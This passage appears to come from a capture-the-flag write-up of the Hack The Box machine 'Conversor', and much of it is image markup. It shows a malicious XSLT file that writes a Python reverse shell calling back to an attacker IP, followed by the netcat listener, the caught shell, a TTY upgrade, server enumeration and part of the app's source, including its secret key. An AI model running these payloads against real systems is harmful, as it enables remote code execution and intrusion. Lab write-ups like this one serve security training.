12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It&#8217;s asking for XML and XSLT File type, so I create this, hopefully this could be our foot-hold,</p><p>Here&#8217;s a HTTP request for testing:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZE1p!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZE1p!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 424w, https://substackcdn.com/image/fetch/$s_!ZE1p!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 848w, https://substackcdn.com/image/fetch/$s_!ZE1p!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 1272w, https://substackcdn.com/image/fetch/$s_!ZE1p!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZE1p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png" width="1600" height="855" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:855,&quot;width&quot;:1600,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:204924,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5f857cb7-74ab-400c-b43f-d181d7cbf562_1600x855.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZE1p!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 424w, https://substackcdn.com/image/fetch/$s_!ZE1p!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 848w, https://substackcdn.com/image/fetch/$s_!ZE1p!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 1272w, https://substackcdn.com/image/fetch/$s_!ZE1p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa523cf2b-d897-4fa4-97e1-ad3010db221e_1600x855.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Great, it&#8217;s really taking it, if your&#8217;re trying XXE for let&#8217;s say /etc/passwd, I don&#8217;t think it&#8217;s rendering, as example:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7Hm6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7Hm6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 424w, https://substackcdn.com/image/fetch/$s_!7Hm6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 848w, https://substackcdn.com/image/fetch/$s_!7Hm6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 1272w, https://substackcdn.com/image/fetch/$s_!7Hm6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7Hm6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png" width="866" height="312" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:312,&quot;width&quot;:866,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:17262,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7Hm6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 424w, https://substackcdn.com/image/fetch/$s_!7Hm6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 848w, https://substackcdn.com/image/fetch/$s_!7Hm6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 1272w, https://substackcdn.com/image/fetch/$s_!7Hm6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae371a5-a963-4338-b773-186dff9ffc52_866x312.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It&#8217;s the same as regular request:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9SqK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9SqK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 424w, https://substackcdn.com/image/fetch/$s_!9SqK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 848w, https://substackcdn.com/image/fetch/$s_!9SqK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 1272w, https://substackcdn.com/image/fetch/$s_!9SqK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9SqK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png" width="1456" height="778" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:778,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:194164,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9SqK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 424w, https://substackcdn.com/image/fetch/$s_!9SqK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 848w, https://substackcdn.com/image/fetch/$s_!9SqK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 1272w, https://substackcdn.com/image/fetch/$s_!9SqK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88332073-c595-4db3-8f22-9d6a07fdbc42_1600x855.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So what we&#8217;re can do It&#8217;s crafting a payloads that would processing our payloads and gain us access to the SYSTEM, and a result here&#8217;s your kit,</p><p>XML:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat exploit.xml             
&lt;?xml version=&#8221;1.0&#8221;?&gt;
&lt;ptswarm&gt;exploit&lt;/ptswarm&gt;</code></pre><p>XSLT:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat exploit.xslt 
&lt;?xml version=&#8221;1.0&#8221; encoding=&#8221;UTF-8&#8221;?&gt;
&lt;xsl:stylesheet
        xmlns:xsl=&#8221;http://www.w3.org/1999/XSL/Transform&#8221;
    xmlns:ptswarm=&#8221;http://exslt.org/common&#8221;
    extension-element-prefixes=&#8221;ptswarm&#8221;
    version=&#8221;1.0&#8221;&gt;
&lt;xsl:template match=&#8221;/&#8221;&gt;
  &lt;ptswarm:document href=&#8221;/var/www/conversor.htb/scripts/test2.py&#8221; method=&#8221;text&#8221;&gt;
import os

os.system(
    &#8220;python3 -c &#8216;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\&#8221;10.10.14.11\&#8221;,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\&#8221;/bin/sh\&#8221;,\&#8221;-i\&#8221;])&#8217;&#8221;
)
  &lt;/ptswarm:document&gt;
&lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;</code></pre><p>It&#8217;s containing the execution of revere-shell in python, hopefully the SYSTEM digest it well.</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ls -al               
total 32
drwxr-xr-x   6 root root 4096 Oct 26 03:06 .
drwxr-xr-x 118 root root 4096 Oct 26 02:58 ..
drwxr-xr-x   2 root root 4096 Oct 26 02:58 db
-rw-r--r--   1 root root   46 Oct 26 03:06 exploit.xml
-rw-r--r--   1 root root  643 Oct 26 03:06 exploit.xslt
drwxr-xr-x   2 root root 4096 Oct 26 03:00 nmap
drwxr-xr-x   2 root root 4096 Oct 26 02:58 upload
drwxr-xr-x   2 root root 4096 Oct 26 02:58 www</code></pre><ol start="3"><li><p><em>Reverse Shell initial Foothold and Internal Enumeration</em></p></li></ol><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nc -lvnp 9001                                          
listening on [any] 9001 ...
</code></pre><p>Upload your attack:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Qbdp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Qbdp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 424w, https://substackcdn.com/image/fetch/$s_!Qbdp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 848w, https://substackcdn.com/image/fetch/$s_!Qbdp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 1272w, https://substackcdn.com/image/fetch/$s_!Qbdp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Qbdp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png" width="1523" height="747" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:747,&quot;width&quot;:1523,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:234515,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0f77ba37-3b2d-4777-9523-4abcf2375e7a_1523x747.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Qbdp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 424w, https://substackcdn.com/image/fetch/$s_!Qbdp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 848w, https://substackcdn.com/image/fetch/$s_!Qbdp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 1272w, https://substackcdn.com/image/fetch/$s_!Qbdp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62747cfc-373a-4d6a-8cf4-af17d8758e59_1523x747.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nc -lvnp 9001                                          
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.92] 34274
/bin/sh: 0: which python
can&#8217;t access tty; job control turned off
$ python3 -c &#8216;import pty; pty.spawn(&#8221;/bin/bash&#8221;)&#8217;
$ www-data@conversor:~$ ^Z
zsh: suspended  sudo nc -lvnp 9001
                                                                                                                                                                                                                                            
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ stty raw -echo; fg
[1]  + continued  sudo nc -lvnp 9001

www-data@conversor:~$ export TERM=xterm
www-data@conversor:~$ </code></pre><p>That&#8217;s it, you get your Shell, upgrade your TTY by:</p><pre><code>python3 -c &#8216;import pty; pty.spawn(&#8221;/bin/bash&#8221;)&#8217;
^Z [CTRL+Z]
stty raw -echo; fg
export TERM=xterm</code></pre><pre><code>www-data@conversor:~$ whoami
www-data
www-data@conversor:~$ groups
www-data
www-data@conversor:~$ cd /home
www-data@conversor:/home$ ls -al
total 12
drwxr-xr-x  3 root       root       4096 Jul 31 01:37 .
drwxr-xr-x 19 root       root       4096 Oct 21 05:45 ..
drwxr-x---  5 fismathack fismathack 4096 Oct 26 03:17 fismathack
www-data@conversor:/home$ </code></pre><p>User:</p><pre><code>fismathack</code></pre><p>Well, one of easy way are to LinPEAS your way mapping, but lte&#8217;s do some manual for the sake of Write-ups:</p><pre><code>www-data@conversor:/home$ cd /var
www-data@conversor:/var$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  spool  tmp  www
www-data@conversor:/var$ cd backups
www-data@conversor:/var/backups$ ls
alternatives.tar.0        apt.extended_states.3.gz  dpkg.statoverride.0
apt.extended_states.0     apt.extended_states.4.gz  dpkg.status.0
apt.extended_states.1.gz  dpkg.arch.0               hygiene
apt.extended_states.2.gz  dpkg.diversions.0
www-data@conversor:/var/backups$ cd ..
www-data@conversor:/var$ cd mail
www-data@conversor:/var/mail$ ls
www-data@conversor:/var/mail$ cd ..
www-data@conversor:/var$ cd www
www-data@conversor:~$ ls
conversor.htb
www-data@conversor:~$ cd conversor.htb
www-data@conversor:~/conversor.htb$ ls
app.py  app.wsgi  instance  __pycache__  scripts  static  templates  uploads
www-data@conversor:~/conversor.htb$ cd uploads
www-data@conversor:~/conversor.htb/uploads$ ls
00cfcc4d-0a8e-43ad-b612-e3662f0f3577.html  exploit.xml
1ca48bd5-7016-4545-83b1-69e048f38dc7.html  exploit.xslt
70927e1b-bc1f-408b-bf6c-206cd2a257b2.html  test.xml
90ec9e53-4de0-43a8-bb2c-4625ce2ab1e1.html  test.xslt
ea464f2a-119e-4ce1-b839-028c9d466d34.html
www-data@conversor:~/conversor.htb/uploads$ cd ..
www-data@conversor:~/conversor.htb$ cd static
www-data@conversor:~/conversor.htb/static$ ls
images  nmap.xslt  source_code.tar.gz  style.css
www-data@conversor:~/conversor.htb/static$ cd ..
www-data@conversor:~/conversor.htb$ cat app.py 
from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory
import os, sqlite3, hashlib, uuid

app = Flask(__name__)
app.secret_key = &#8216;C0nv3rs0rIsthek3y29&#8217;

BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DB_PATH = &#8216;/var/www/conversor.htb/instance/users.db&#8217;
UPLOAD_FOLDER = os.path.join(BASE_DIR, &#8216;uploads&#8217;)
os.makedirs(UPLOAD_FOLDER, exist_ok=True)

def init_db():
    os.makedirs(os.path.join(BASE_DIR, &#8216;instance&#8217;), exist_ok=True)
    conn = sqlite3.connect(DB_PATH)
    c = conn.cursor()
    c.execute(&#8217;&#8216;&#8217;CREATE TABLE IF NOT EXISTS users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE,
        password TEXT
    )&#8217;&#8216;&#8217;)
    c.execute(&#8217;&#8216;&#8217;CREATE TABLE IF NOT EXISTS files (
        id TEXT PRIMARY KEY,
        user_id INTEGER,
        filename TEXT,
        FOREIGN KEY(user_id) REFERENCES users(id)
    )&#8217;&#8216;&#8217;)
    conn.commit()
    conn.close()

init_db()

def get_db():
    conn = sqlite3.connect(DB_PATH)
    conn.row_factory = sqlite3.Row
    return conn

@app.route(&#8217;/&#8217;)
def index():
    if &#8216;user_id&#8217; not in session:
        return redirect(url_for(&#8217;login&#8217;))
    conn = get_db()
    cur = conn.cursor()
    cur.execute(&#8221;SELECT * FROM files WHERE user_id=?&#8221;, (session[&#8217;user_id&#8217;],))
    files = cur.fetchall()
    conn.close()
    return render_template(&#8217;index.html&#8217;, files=files)

@app.route(&#8217;/register&#8217;, methods=[&#8217;GET&#8217;,&#8217;POST&#8217;])
def register():
    if request.method == &#8216;POST&#8217;:
        username = request.form[&#8217;username&#8217;]
        password = hashlib.md5(request.form[&#8217;password&#8217;].encode()).hexdigest()
        conn = get_db()
        try:
